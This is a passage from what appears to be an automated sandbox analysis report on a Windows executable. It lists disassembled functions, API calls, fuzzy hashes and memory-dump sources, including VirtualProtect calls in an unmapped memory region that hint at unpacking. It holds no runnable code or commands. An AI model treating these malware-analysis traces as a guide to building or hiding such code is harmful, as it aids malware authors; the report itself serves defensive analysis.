                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Byte$CharMultiStringWide$Alloc
                                                                  • String ID:
                                                                  • API String ID: 3384502665-0
                                                                  • Opcode ID: 2f768fecabc726658f8f88acdcbfcc7f4af63c07174896c7a40ff147d03d0804
                                                                  • Instruction ID: dc896c3cb116076c9357b3b04fc63cbba15b70dbedf9f50e9427452b928ef166
                                                                  • Opcode Fuzzy Hash: 2f768fecabc726658f8f88acdcbfcc7f4af63c07174896c7a40ff147d03d0804
                                                                  • Instruction Fuzzy Hash: F1F05471207234BF93205B67DC48CEBBF9CEE8B2A4B014526F545C2110C6355801CBF6
                                                                  Function 00409508 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IntersectRect.USER32(?,00000000,?), ref: 00409539
                                                                  • EqualRect.USER32(?,00000000), ref: 00409546
                                                                  • IsRectEmpty.USER32(?), ref: 00409550
                                                                  • InvalidateRect.USER32(?,?,?), ref: 0040956D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Rect$EmptyEqualIntersectInvalidate
                                                                  • String ID:
                                                                  • API String ID: 3354205298-0
                                                                  • Opcode ID: f9175667af0f7be801df8ef0be15282322e2dc242db8e47f337ba70243cfd374
                                                                  • Instruction ID: 5a9675a2ec0c149863344b7b821c378a1e07663030a84a8ac4983ad52a3ab610
                                                                  • Opcode Fuzzy Hash: f9175667af0f7be801df8ef0be15282322e2dc242db8e47f337ba70243cfd374
                                                                  • Instruction Fuzzy Hash: 60014C3290011AEBDF11DFA5DC48EAAB7BCFF09314F408462F914A7111D230A6068B64
                                                                  Function 004239DB Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindResourceA.KERNEL32(?,?,000000F0), ref: 004239FD
                                                                  • LoadResource.KERNEL32(?,00000000,?,?,?,?,00420245,?,?,00403D00,?,?,?,?,?,0042CC28), ref: 00423A09
                                                                  • LockResource.KERNEL32(00000000,?,?,?,?,00420245,?,?,00403D00,?,?,?,?,?,0042CC28,000000FF), ref: 00423A16
                                                                  • FreeResource.KERNEL32(00000000,?,?,?,?,00420245,?,?,00403D00,?,?,?,?,?,0042CC28,000000FF), ref: 00423A31
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FindFreeLoadLock
                                                                  • String ID:
                                                                  • API String ID: 1078018258-0
                                                                  • Opcode ID: e10056d9a2660e3800f5a85b41266e3d05e9b35dc89b2b7957be5cf1a157bfe8
                                                                  • Instruction ID: f1e10e0b9d610b383d076a7a45ed5418143a48e9ec23dbbc25ebf98e0a5bfae2
                                                                  • Opcode Fuzzy Hash: e10056d9a2660e3800f5a85b41266e3d05e9b35dc89b2b7957be5cf1a157bfe8
                                                                  • Instruction Fuzzy Hash: E6F09036300225AB97219FA77C44D3BB6BCAF85762B85007EFE45D3211DE698D028679
                                                                  Function 0041FC6D Relevance: 6.0, APIs: 4, Instructions: 41windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • EnableMenuItem.USER32(?,?,?), ref: 0041FC98
                                                                  • GetFocus.USER32 ref: 0041FCAB
                                                                  • GetParent.USER32(?), ref: 0041FCB9
                                                                  • SendMessageA.USER32(?,00000028,00000000,00000000), ref: 0041FCCE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: EnableFocusItemMenuMessageParentSend
                                                                  • String ID:
                                                                  • API String ID: 2297321873-0
                                                                  • Opcode ID: 5848d75683eeff144eec62b50be30f757bc95a58dccda503d274df78e6b91d20
                                                                  • Instruction ID: 667ea2b61b03b80e95b8bbf3fcb0286f57c03423c76812f661bbdfa9ca70b136
                                                                  • Opcode Fuzzy Hash: 5848d75683eeff144eec62b50be30f757bc95a58dccda503d274df78e6b91d20
                                                                  • Instruction Fuzzy Hash: 5501B130200605AFD7349F21DC09B5ABBB0FF50321F504A2EF502925F0D778B886EB88
                                                                  Function 00424346 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: H_prologTextWindowlstrcpynlstrlen
                                                                  • String ID:
                                                                  • API String ID: 3022380644-0
                                                                  • Opcode ID: 9588c763b94ff57c08a9a562fa99b45d125bae693aa3a85c8c8a5c58bf168152
                                                                  • Instruction ID: 038d39e764909cb72f487515755dd880c683e44097d606ce0493c2f887320532
                                                                  • Opcode Fuzzy Hash: 9588c763b94ff57c08a9a562fa99b45d125bae693aa3a85c8c8a5c58bf168152
                                                                  • Instruction Fuzzy Hash: 4B018C31600524EFCB14DFA4C808BAEBBB1FF48315F40CA6AF9129B261CB399950DF94
                                                                  Function 0041A2EE Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ___addl
                                                                  • String ID:
                                                                  • API String ID: 2260456530-0
                                                                  • Opcode ID: 9462fbb24550e51235c69811f5d997a06ce5764b14ffee6f8e6d9ade5b511c72
                                                                  • Instruction ID: bebc27e0ad429c0126922934f5b1fa86729f384fc2e22584e0928f5d8e1cdaa7
                                                                  • Opcode Fuzzy Hash: 9462fbb24550e51235c69811f5d997a06ce5764b14ffee6f8e6d9ade5b511c72
                                                                  • Instruction Fuzzy Hash: 92F0CD3A401202AFCA105A02DC01EA3B7E9FF04354B0404ABFD5982235E732E8BCCB52
                                                                  Function 004265BD Relevance: 6.0, APIs: 4, Instructions: 33stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?), ref: 004265D2
                                                                  • GetWindowTextA.USER32(?,?,00000100), ref: 004265EE
                                                                  • lstrcmpA.KERNEL32(?,?), ref: 00426602
                                                                  • SetWindowTextA.USER32(?,?), ref: 00426612
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: TextWindow$lstrcmplstrlen
                                                                  • String ID:
                                                                  • API String ID: 330964273-0
                                                                  • Opcode ID: 205df15bef250dda04495d21c1cf24ecad239e14aeebe1b9e08572ee8303819d
                                                                  • Instruction ID: 32920149c2e13a73d1dc760514e2eeab2557267489b4b68b72185029daae6c0c
                                                                  • Opcode Fuzzy Hash: 205df15bef250dda04495d21c1cf24ecad239e14aeebe1b9e08572ee8303819d
                                                                  • Instruction Fuzzy Hash: 9FF0F975600118EBDF21AF65EC489CE7B69FB08350F4081A2F945E2260D7798A95DBA8
                                                                  Function 0042068B Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • EnableWindow.USER32(00000000,00000001), ref: 0042069E
                                                                  • GetActiveWindow.USER32 ref: 004206A9
                                                                  • SetActiveWindow.USER32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 004206B7
                                                                  • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 004206D3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Window$Active$EnableFreeResource
                                                                  • String ID:
                                                                  • API String ID: 3751187028-0
                                                                  • Opcode ID: 252fd1aecebcf36ae1063793674cdf2c0fb2d0a1c58f11556f040e13d421e044
                                                                  • Instruction ID: 651b9e4e32d33f6c41131df07468a60757a46e08b7472d39c7ef1db3212f965c
                                                                  • Opcode Fuzzy Hash: 252fd1aecebcf36ae1063793674cdf2c0fb2d0a1c58f11556f040e13d421e044
                                                                  • Instruction Fuzzy Hash: 7DF08731B00325CFCF20EF90E8846AEB7F1FF48312F80053AE102B26A1C7396912CA19
                                                                  Function 0042A3E2 Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 0042A404
                                                                  • GetTickCount.KERNEL32 ref: 0042A411
                                                                  • CoFreeUnusedLibraries.OLE32 ref: 0042A420
                                                                  • GetTickCount.KERNEL32 ref: 0042A426
                                                                    • Part of subcall function 0042A38B: CoFreeUnusedLibraries.OLE32(00000000,0042A46B,00000000,?,?,00409F1F), ref: 0042A3CF
                                                                    • Part of subcall function 0042A38B: OleUninitialize.OLE32(?,?,00409F1F), ref: 0042A3D5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                                                  • String ID:
                                                                  • API String ID: 685759847-0
                                                                  • Opcode ID: a7b6454c06bf55826f1ca2544db4a5b5e913ae1ac901965ee86b94635a762fcd
                                                                  • Instruction ID: 53365efa4c1230ee432236039d3407cb682c0de065b522118cd881790a3b89b9
                                                                  • Opcode Fuzzy Hash: a7b6454c06bf55826f1ca2544db4a5b5e913ae1ac901965ee86b94635a762fcd
                                                                  • Instruction Fuzzy Hash: D0E06D31905261CBC710BBA4FC4C26A3BA0BB50308F409837E80193270C77868A5CF5B
                                                                  Function 0040FC9F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 133COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCPInfo.KERNEL32(?,?,00000000,00000000), ref: 0040FCD9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Info
                                                                  • String ID: @D$@D
                                                                  • API String ID: 1807457897-1398737213
                                                                  • Opcode ID: 91e4028214e053c96e7723c0768ed27d2ed356ddb9a79d95c398ad60e743bbb3
                                                                  • Instruction ID: 62482ca91026c37aa1dac497eb650ef51dc4ea81e72a355b0f7e427c1810b87f
                                                                  • Opcode Fuzzy Hash: 91e4028214e053c96e7723c0768ed27d2ed356ddb9a79d95c398ad60e743bbb3
                                                                  • Instruction Fuzzy Hash: 404139749041519FE720CFB4D48167A7BA1AF49304F28447FD68AEB7A2D23D581E8B8D
                                                                  Function 0040FAA4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Info
                                                                  • String ID: $
                                                                  • API String ID: 1807457897-3032137957
                                                                  • Opcode ID: a6edd212cb7947d5841bf6e2cae9edd82bd8bb28a2de40edc7fc4ba90436b0ee
                                                                  • Instruction ID: e3cc246aaaae655b62ba72c07eeb59b114e224ef0f58dc480b4ed99257abb5d6
                                                                  • Opcode Fuzzy Hash: a6edd212cb7947d5841bf6e2cae9edd82bd8bb28a2de40edc7fc4ba90436b0ee
                                                                  • Instruction Fuzzy Hash: 4441CD7150425C5EEB218764DC5ABFB3BE8EB06304F2408F2DA44E7192C27819ADDB9C
                                                                  Function 004166A1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: __shift_strcat_strlen
                                                                  • String ID: e+000
                                                                  • API String ID: 208078240-1027065040
                                                                  • Opcode ID: 194d25e77a56b344b629a956c0d25f441e46d8e36f353af7accf61324439c85b
                                                                  • Instruction ID: 89f468d84c82e1ace85985d2492e42cf5a36f8a17d3e9c42b5c9dfd052896992
                                                                  • Opcode Fuzzy Hash: 194d25e77a56b344b629a956c0d25f441e46d8e36f353af7accf61324439c85b
                                                                  • Instruction Fuzzy Hash: 2221C0722093904FD72A9E38DC947E63BD45B03318F1944BFE485CA2D2D67DC885C759
                                                                  Function 00419FDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000000,021313E0,00000000,00000007,00000007,^@,004176A0,00000000), ref: 0041A003
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,0000003C,00000000,?,?,0000003C,00000000,?), ref: 0041A026
                                                                    • Part of subcall function 0040E502: __lock.LIBCMT ref: 0040E520
                                                                    • Part of subcall function 0040E502: HeapFree.KERNEL32(00000000,?,00431A60,0000000C,004108CC,00000000,00431B30,00000008,00410901,?,?,?,00410723,00000004,00431B20,00000010), ref: 0040E567
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$FreeHeap__lock
                                                                  • String ID: ^@
                                                                  • API String ID: 38926842-3067454934
                                                                  • Opcode ID: 2318afb57be2129960d38f3a2b4ee928f934c80d6b1bab9723fc74fbe9b91bfe
                                                                  • Instruction ID: 184d1faa913d037cc4e56e763f0fd7e80dd229126f78ea24d8bc9510c4970353
                                                                  • Opcode Fuzzy Hash: 2318afb57be2129960d38f3a2b4ee928f934c80d6b1bab9723fc74fbe9b91bfe
                                                                  • Instruction Fuzzy Hash: 5611A371907124BA9B209FAA9C45CDFBF6CDE0A7B4B304567F014E21D0EB349E50D6A9
                                                                  Function 0042149E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetClassInfoA.USER32(?,-0000007C,?), ref: 004214FD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ClassInfo
                                                                  • String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
                                                                  • API String ID: 3534257612-2801496823
                                                                  • Opcode ID: bd080865469e38637f7ee73eafe3d082cd40be6588647cb402949ac972de2cf5
                                                                  • Instruction ID: 4ba1055b97871b79f2e7e250bc91374e937afd52b24a3d5666128ff83e3a1e39
                                                                  • Opcode Fuzzy Hash: bd080865469e38637f7ee73eafe3d082cd40be6588647cb402949ac972de2cf5
                                                                  • Instruction Fuzzy Hash: 992130B1A00219AB8F10EF96E8419DE7BB8BE58354F50406BF908E3251E7389951CBA9
                                                                  Function 004129C5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___initmbctable.LIBCMT ref: 004129D7
                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\ExeFile (233).exe,00000104,76230A60,00000000,?,?,?,?,0040E931,?,00431A70,00000060), ref: 004129EF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: FileModuleName___initmbctable
                                                                  • String ID: C:\Users\user\Desktop\ExeFile (233).exe
                                                                  • API String ID: 767393020-2966024786
                                                                  • Opcode ID: 101123d8790505b808453694c3784ed6a65f9cded7262870a66330ec90ee2c88
                                                                  • Instruction ID: fe4f9612b987f02c86c9f827e6e88cda74fa422bc8271a69fa383c6bdeb5fba6
                                                                  • Opcode Fuzzy Hash: 101123d8790505b808453694c3784ed6a65f9cded7262870a66330ec90ee2c88
                                                                  • Instruction Fuzzy Hash: 4A110D72E04104EBC720DBA9ED419DB77A8EB553A0F10017FF905E3290E6B49D45CB98
                                                                  Function 021F2430 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 021F2468
                                                                  • VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 021F24B2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113850461.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_21f1000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: @
                                                                  • API String ID: 544645111-2766056989
                                                                  • Opcode ID: 14c15e6223799ba746728dc70be7de4913c20ad4deae5ef25c380b9e6038f451
                                                                  • Instruction ID: 57c4d599bda53162a2468fe3e0f427e3745f3a61e68525280d5b97e6fc7040e3
                                                                  • Opcode Fuzzy Hash: 14c15e6223799ba746728dc70be7de4913c20ad4deae5ef25c380b9e6038f451
                                                                  • Instruction Fuzzy Hash: 5821E9B0E44209EFDF54CF94C980BADBBB5BF44304F108599DE25A7240C7B4AA80DF55
                                                                  Function 00425FE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00405C41: GetWindowExtEx.GDI32(?,?), ref: 00405C4D
                                                                    • Part of subcall function 00405C1D: GetViewportExtEx.GDI32(?,?), ref: 00405C29
                                                                  • MulDiv.KERNEL32(00407746,00000000,00000000), ref: 00426020
                                                                  • MulDiv.KERNEL32(4689EC45,00000000,00000000), ref: 0042603D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ViewportWindow
                                                                  • String ID: Fw@
                                                                  • API String ID: 1589084482-2650048193
                                                                  • Opcode ID: 8ba70028f401d5047d1f3a52ed28d91a46c6a7a7344e8140392911f288c2f3f7
